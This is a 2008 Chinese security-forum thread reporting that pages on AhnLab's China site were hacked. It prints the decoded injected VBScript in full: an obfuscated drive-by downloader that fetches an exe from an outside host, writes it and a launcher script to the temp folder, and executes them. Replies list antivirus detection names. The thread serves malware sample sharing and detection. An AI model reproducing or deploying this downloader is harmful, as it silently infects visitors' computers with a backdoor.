查看: 3540|回复: 21
收起左侧

[病毒样本] 安博士部分页面被挂

[复制链接]
jimmyleo
发表于 2008-3-14 19:00:30 | 显示全部楼层 |阅读模式
jdyxh.ahn.com.cn

解出

  1. <script language=VBScript>
  2. On Error Resume Next
  3. cuteqq = "http://tangyong.go.51.net/w.exe"
  4. Set cuteqq2 = document.createElement("object")
  5. cuteqqid="clsid:"
  6. cuteqqidx="BD96"
  7. cuteqqid2="C556-65"
  8. cuteqqid3="A3-11D"
  9. cuteqqid4="0-98"
  10. cuteqqid5="3A-00C"
  11. cuteqqid6="04FC"
  12. cuteqqid7="29E36"
  13. cuteqq3="Microsoft.X"
  14. cuteqq4="MLHTTp"
  15. cuteqq2.SetAttribute "classid", cuteqqid&cuteqqidx&cuteqqid2&cuteqqid3&cuteqqid4&cuteqqid5&cuteqqid6&cuteqqid7
  16. cuteqq5=cuteqq3&cuteqq4
  17. Set lovecuteqq = cuteqq2.CreateObject(cuteqq5,"")
  18. lovecuteqq.Open "GET", cuteqq, False
  19. lovecuteqq.Send
  20. Cuteqq_784378237="MicroSofts.pif"
  21. Cuteqq_784378237s="MicroSofts.vbs"
  22. Q784378237="Scripting."
  23. Q784378237s="FileSyst"
  24. Q784378237ss="emObject"
  25. Q784378237sss="Adod"
  26. Q784378237ssss="b.stream"
  27. Q784378237sssss=Q784378237sss&Q784378237ssss
  28. Set chilam = cuteqq2.createobject(Q784378237&Q784378237s&Q784378237ss,"")
  29. Set yingying = chilam.GetSpecialFolder(2)
  30. Cuteqq_784378237=chilam.BuildPath(yingying,Cuteqq_784378237)
  31. Cuteqq_784378237s=chilam.BuildPath(yingying,Cuteqq_784378237s)
  32. Set chilams = cuteqq2.createobject(Q784378237sssss,"")
  33. chilams.type=1
  34. chilams.Open
  35. chilams.Write lovecuteqq.ResponseBody
  36. chilams.Savetofile Cuteqq_784378237,2
  37. chilams.Close
  38. chilams.Type=2
  39. chilams.Open
  40. chilams.WriteText  "Set Lovecuteqq = CreateObject(""Wscript.Shell"")"&vbCrLf&"Lovecuteqq.run ("""&Cuteqq_784378237&""")"
  41. chilams.Savetofile Cuteqq_784378237s,2
  42. chilams.Close
  43. cute="Shell.Applica"
  44. qq="tion"
  45. Set cute_qq = cuteqq2.createobject(cute&qq,"")
  46. Qq784378237="O"
  47. Qq784378237s="p"
  48. Qq784378237ss="e"
  49. Qq784378237sss="n"
  50. cute_qq.SHelLExeCuTe Cuteqq_784378237s,"","",Qq784378237&Qq784378237s&Qq784378237ss&Qq784378237sss,0
  51. </script>
  52. <script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
  53. <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
复制代码



hxxp://tangyong.go.51.net/w.exe

avira乱报 linkscanner索性没报...

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
spaceplane
发表于 2008-3-14 19:04:48 | 显示全部楼层
BD 飘
spaceplane
发表于 2008-3-14 19:06:26 | 显示全部楼层

NOD

E:\pic\_PICtemp\w.rar >>RAR >>w.exe - 可能是 Win32/PcClient 木马 的一个变种
promised
发表于 2008-3-14 19:07:47 | 显示全部楼层
C:\ABC\2\w.exe - 特征码 'Backdoor.Win32.PcClient.yw' 被发现
醉一生爱妍
发表于 2008-3-14 19:10:43 | 显示全部楼层
   

哎,做个报告吧

。。。。。。。。。

对EQSBIE还不是很熟悉

我说怎么没日志。。。。。。。。。

[ 本帖最后由 garyyan456 于 2008-3-14 19:17 编辑 ]

评分

参与人数 1经验 -6 收起 理由
promised -6 抱歉,这个帖子属于灌水,警示特殊用户组

查看全部评分

jimmyleo
 楼主| 发表于 2008-3-14 19:12:07 | 显示全部楼层

回复 5楼 garyyan456 的帖子

你去看了 就知道蛮有聊的
solcroft
发表于 2008-3-14 19:12:26 | 显示全部楼层
Sign of "Win32:Agent-EPC [Trj]" has been found in "http://tangyong.go.51.net/w.exe" file.
深红的雪
发表于 2008-3-14 19:14:16 | 显示全部楼层
安博士难道想效仿东方卫士
qigang
发表于 2008-3-14 19:16:19 | 显示全部楼层
rising20.35.41未杀。
jimmyleo
 楼主| 发表于 2008-3-14 19:17:17 | 显示全部楼层

回复 8楼 rappar 的帖子

安博士 是 来自 韩国的朋友
进入国内了解到了 东方卫士这个兄弟...
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-1 13:24 , Processed in 0.131563 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表